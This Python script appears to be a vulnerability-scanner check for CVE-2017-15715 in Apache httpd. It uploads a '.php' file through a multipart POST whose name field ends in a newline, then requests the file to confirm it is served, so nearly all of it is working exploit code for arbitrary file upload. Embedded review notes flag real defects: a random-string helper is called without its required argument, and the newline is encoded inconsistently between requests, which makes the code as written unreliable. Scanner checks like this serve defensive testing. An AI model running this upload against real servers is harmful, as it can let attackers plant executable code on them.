CVE-2017-15715.py
import requests
import random
import string
# Vuln Base Info
def info():
    """Return the static vulnerability descriptor for this check (CVE-2017-15715).

    poc() attaches this dictionary as result["info"] on a positive result.
    Every value is fixed metadata; nothing here is derived from the target.
    """
    classification = {
        "cvss-metrics": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cvss-score": "",  # no numeric score is recorded for this entry
        "cve-id": "CVE-2017-15715",
        "cwe-id": "CWE-20",
    }
    description = (
        "In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> "
        "could match '$' to a newline character in a malicious filename, rather than "
        "matching only the end of the filename. This could be exploited in environments "
        "where uploads of some files are externally blocked, but only by matching the "
        "trailing portion of the filename."
    )
    return {
        "author": "cckuailong",
        "name": "Apache Arbitrary File Upload",
        "description": description,
        "severity": "high",
        "references": [
            "https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715",
        ],
        "classification": classification,
        "metadata": {"vuln-target": ""},
        "tags": ["cve", "cve2017", "apache", "httpd", "fileupload"],
    }
# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook for this check.

    No banner, header or version probe is performed: the target is accepted
    unconditionally and the url argument is not inspected.
    """
    is_match = True
    return is_match
# Proof of Concept
def poc(url: str) -> dict:
    """Check a target for CVE-2017-15715 and return a result dictionary.

    Two requests are issued: a multipart POST to "/" whose "name" field
    value ends in a newline byte, then a GET for the resulting path. The
    check is positive only when the random marker placed in the POST file
    part appears in the GET response body.

    Returns:
        {"success": True, "info": ..., "payload": ...} when the marker is
        served back; {"success": False} when any exception is raised inside
        the try block; an empty dict when both requests complete but the
        marker is absent (there is no else branch for that case).

    NOTE(review): gen_randstr() below declares a required ``length``
    parameter and both calls here pass no argument, so they raise TypeError
    before the try block and the error propagates to the caller — confirm
    the intended signature.
    """
    result: dict = {}
    randstr = gen_randstr()
    randstr_1 = gen_randstr()
    try:
        url = format_url(url)
        path = """/"""
        method = "POST"
        # Multipart body: a file part named "<randstr>.php" carrying the
        # second marker, and a "name" field whose value ends in \x0A — a real
        # newline byte, since this is an ordinary (non-raw) string literal.
        data = """------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="file"; filename="{randstr}.php"
{randstr_1}
------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="name"
{randstr}.php\x0A
------WebKitFormBoundaryKc8fBVDo558U4hbJ--""".format(randstr=randstr, randstr_1=randstr_1)
        headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ'}
        # verify=False turns off TLS certificate validation for this request;
        # the response object is not used afterwards.
        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
        # NOTE(review): "\\x0A" here is an escaped backslash, so the GET path
        # ends in the four literal characters \x0A rather than the newline
        # byte used in the POST body above — the two encodings differ.
        path = """/{randstr}.php\\x0A""".format(randstr=randstr)
        method = "GET"
        data = """"""
        headers = {'Accept-Encoding': 'gzip,deflate', 'Accept': '*/*'}
        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
        # Positive only if the marker from the uploaded file part is echoed.
        if randstr_1 in resp1.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path
    except:
        # Bare except: connection errors, timeouts and any other exception
        # raised inside the try are collapsed into a plain failure, so the
        # caller cannot distinguish "not vulnerable" from "could not test".
        result["success"] = False
    return result
# Exploit; can be the same as poc()
def exp(url):
    """Exploit entry point; for this check it simply delegates to poc()."""
    outcome = poc(url)
    return outcome
# Utils
def format_url(url):
    """Normalise a target string into a scheme-prefixed URL with no trailing slash.

    Surrounding whitespace is stripped, "http://" is prepended when neither
    "http://" nor "https://" is already present, and every trailing "/" is
    removed.
    """
    cleaned = url.strip()
    has_scheme = cleaned.startswith(("http://", "https://"))
    if not has_scheme:
        cleaned = "http://" + cleaned
    return cleaned.rstrip("/")
def gen_randstr(length):
    """Return ``length`` distinct ASCII alphanumeric characters in random order.

    random.sample draws without replacement, so no character repeats and
    ``length`` cannot exceed the 62-character alphabet (random.sample raises
    ValueError otherwise). The result is a request marker, not a secret.
    """
    alphabet = string.ascii_letters + string.digits
    picked = random.sample(alphabet, k=length)
    return "".join(picked)